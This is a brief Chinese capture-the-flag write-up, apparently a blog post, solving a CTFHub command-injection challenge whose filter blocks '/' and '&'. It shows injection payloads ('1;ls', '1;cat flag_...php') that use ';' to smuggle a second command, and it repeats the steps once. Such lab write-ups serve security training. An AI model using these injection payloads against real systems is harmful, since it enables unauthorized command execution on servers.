RCE10-文件包含/命令注入/过滤运算符(直接把&换成;)
一.题目链接:
https://www.ctfhub.com/#/skilltree
二.开始解题
1.查看源代码,这里过滤了/和&
2.构造下面的代码进行绕过
1;ls
3.获取flag文件
1;cat flag_765287529816.php
https://www.ctfhub.com/#/skilltree
1.查看源代码,这里过滤了/和&
2.构造下面的代码进行绕过
1;ls
3.获取flag文件
1;cat flag_765287529816.php
浙公网安备 33010602011771号